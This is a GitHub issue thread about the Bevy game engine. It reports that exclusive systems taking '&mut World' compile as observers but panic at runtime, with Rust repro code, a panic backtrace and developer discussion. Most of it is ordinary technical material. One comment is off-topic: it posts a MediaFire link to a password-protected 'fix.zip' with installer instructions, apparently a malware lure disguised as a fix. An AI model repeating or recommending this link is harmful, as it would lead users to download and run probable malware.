### ISSUE TITLE
`IntoObserverSystem` is implemented for any `IntoSystem`, but observers actually only work with non-exclusive systems

### ISSUE THREAD

**Issue by SkiFire13** [bevyengine/bevy#14925]
## Bevy version

0.14.1

## What you did

```rs
use bevy_ecs::event::Event;
use bevy_ecs::observer::Trigger;
use bevy_ecs::system::In;
use bevy_ecs::world::World;

#[derive(Event)]
struct E;

fn observer(_: In<Trigger<'static, E, ()>>, _: &mut World) {}

fn main() {
    let mut world = World::new();
    world.observe(observer);
    world.flush();
    world.trigger(E);
}
```

## What went wrong

When `world.trigger(E)` calls the observer system it ends up panicking with:

```
thread 'main' panicked at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\bevy_ecs-0.14.1\src\system\exclusive_function_system.rs:99:9:
Cannot run exclusive systems with a shared World reference
stack backtrace:
   0: std::panicking::begin_panic_handler
             at /rustc/051478957371ee0084a7c0913941d2a8c4757bb9/library\std\src\panicking.rs:652
   1: core::panicking::panic_fmt
             at /rustc/051478957371ee0084a7c0913941d2a8c4757bb9/library\core\src\panicking.rs:72
   2: bevy_ecs::system::exclusive_function_system::impl$1::run_unsafe<void (*)(bevy_ecs::system::In<bevy_ecs::observer::Trigger<rust_bevy_snake::E,tuple$<> > >),void (*)(bevy_ecs::system::In<bevy_ecs::observer::Trigger<rust_bevy_snake::E,tuple$<> > >,ref_mut$<be
             at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\bevy_ecs-0.14.1\src\system\exclusive_function_system.rs:99
   3: bevy_ecs::observer::runner::observer_system_runner<rust_bevy_snake::E,tuple$<> >
             at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\bevy_ecs-0.14.1\src\observer\runner.rs:409
   4: bevy_ecs::observer::impl$2::invoke::closure$0<rust_bevy_snake::E,core::array::iter::IntoIter<bevy_ecs::component::ComponentId,0> >
             at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\bevy_ecs-0.14.1\src\observer\mod.rs:192
   5: core::ops::function::impls::impl$3::call_mut<tuple$<tuple$<ref$<bevy_ecs::entity::Entity>,ref$<void (*)(bevy_ecs::world::deferred_world::DeferredWorld,bevy_ecs::observer::ObserverTrigger,bevy_ptr::PtrMut<bevy_ptr::Aligned>)> > >,bevy_ecs::observer::impl$2:
             at /rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\core\src\ops\function.rs:294
   6: core::iter::traits::iterator::Iterator::for_each::call::closure$0<tuple$<ref$<bevy_ecs::entity::Entity>,ref$<void (*)(bevy_ecs::world::deferred_world::DeferredWorld,bevy_ecs::observer::ObserverTrigger,bevy_ptr::PtrMut<bevy_ptr::Aligned>)> >,ref_mut$<bevy_e
             at /rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\core\src\iter\traits\iterator.rs:815
   7: hashbrown::map::impl$63::fold::closure$0<bevy_ecs::entity::Entity,void (*)(bevy_ecs::world::deferred_world::DeferredWorld,bevy_ecs::observer::ObserverTrigger,bevy_ptr::PtrMut<bevy_ptr::Aligned>),tuple$<>,core::iter::traits::iterator::Iterator::for_each::ca
             at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hashbrown-0.14.5\src\map.rs:4749
   8: hashbrown::raw::inner::RawIterRange<tuple$<bevy_ecs::entity::Entity,void (*)(bevy_ecs::world::deferred_world::DeferredWorld,bevy_ecs::observer::ObserverTrigger,bevy_ptr::PtrMut<bevy_ptr::Aligned>)> >::fold_impl<tuple$<bevy_ecs::entity::Entity,void (*)(bevy
             at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hashbrown-0.14.5\src\raw\mod.rs:3880
   9: hashbrown::raw::inner::impl$27::fold<tuple$<bevy_ecs::entity::Entity,void (*)(bevy_ecs::world::deferred_world::DeferredWorld,bevy_ecs::observer::ObserverTrigger,bevy_ptr::PtrMut<bevy_ptr::Aligned>)>,tuple$<>,hashbrown::map::impl$63::fold::closure_env$0<bev
             at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hashbrown-0.14.5\src\raw\mod.rs:4151
  10: hashbrown::map::impl$63::fold<bevy_ecs::entity::Entity,void (*)(bevy_ecs::world::deferred_world::DeferredWorld,bevy_ecs::observer::ObserverTrigger,bevy_ptr::PtrMut<bevy_ptr::Aligned>),tuple$<>,core::iter::traits::iterator::Iterator::for_each::call::closure
             at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hashbrown-0.14.5\src\map.rs:4747
  11: core::iter::traits::iterator::Iterator::for_each<hashbrown::map::Iter<bevy_ecs::entity::Entity,void (*)(bevy_ecs::world::deferred_world::DeferredWorld,bevy_ecs::observer::ObserverTrigger,bevy_ptr::PtrMut<bevy_ptr::Aligned>)>,ref_mut$<bevy_ecs::observer::im
             at /rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\core\src\iter\traits\iterator.rs:818
  12: bevy_ecs::observer::Observers::invoke<rust_bevy_snake::E,core::array::iter::IntoIter<bevy_ecs::component::ComponentId,0> >
             at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\bevy_ecs-0.14.1\src\observer\mod.rs:204
  13: bevy_ecs::world::deferred_world::DeferredWorld::trigger_observers_with_data<rust_bevy_snake::E,core::array::iter::IntoIter<bevy_ecs::component::ComponentId,0> >
             at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\bevy_ecs-0.14.1\src\world\deferred_world.rs:368
  14: bevy_ecs::observer::trigger_event::trigger_event<rust_bevy_snake::E,tuple$<> >
             at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\bevy_ecs-0.14.1\src\observer\trigger_event.rs:61
  15: bevy_ecs::observer::trigger_event::impl$0::apply<rust_bevy_snake::E,tuple$<> >
             at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\bevy_ecs-0.14.1\src\observer\trigger_event.rs:20
  16: bevy_ecs::world::World::trigger<rust_bevy_snake::E>
             at E:\Programmi\Rust\.cargo\registry\src\index.crates.io-6f17d22bba15001f\bevy_ecs-0.14.1\src\observer\mod.rs:275
  17: rust_bevy_snake::main
             at .\src\main.rs:15
  18: core::ops::function::FnOnce::call_once<void (*)(),tuple$<> >
             at /rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\core\src\ops\function.rs:250
  19: core::hint::black_box
             at /rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\core\src\hint.rs:338
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.
```

I can see why observers should not be allowed exclusive world access, but the API does nothing to prevent you from actually creating one and getting a panic only when it gets called.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cBournhonesque** [comment]
How come this compiles? `&mut World` does not implement `SystemParam`, no?

**Comment by SkiFire13** [comment]
> How come this compiles? `&mut World` does not implement `SystemParam`, no?

It compiles because `observe` requires a `IntoObserverSystem<...>`, which is implemented for any `IntoSystem<In=Trigger<...>>`, which includes exclusive systems.

**Comment by cBournhonesque** [comment]
I would expect that some part of the compilation breaks down because the system doesn't implement `SystemParamFunction`

**Comment by ItsDoot** [comment]
Duplicate of #14507?

**Comment by nakedible** [comment]
It is the same thing as #14507 but a little bit different flavor:
1. Observers can't have exclusive world access -> won't fix
2. Observers using exclusive world access compile just fine and fails at runtime -> perhaps fixable?

Ran into this just today while doing some hacks. It could've been nice if it wouldn't have compiled – but on the other hand, the error message of `Cannot run exclusive systems with a shared World reference` was pretty clear, while something not implementing a trait is often more tedious to find out why.
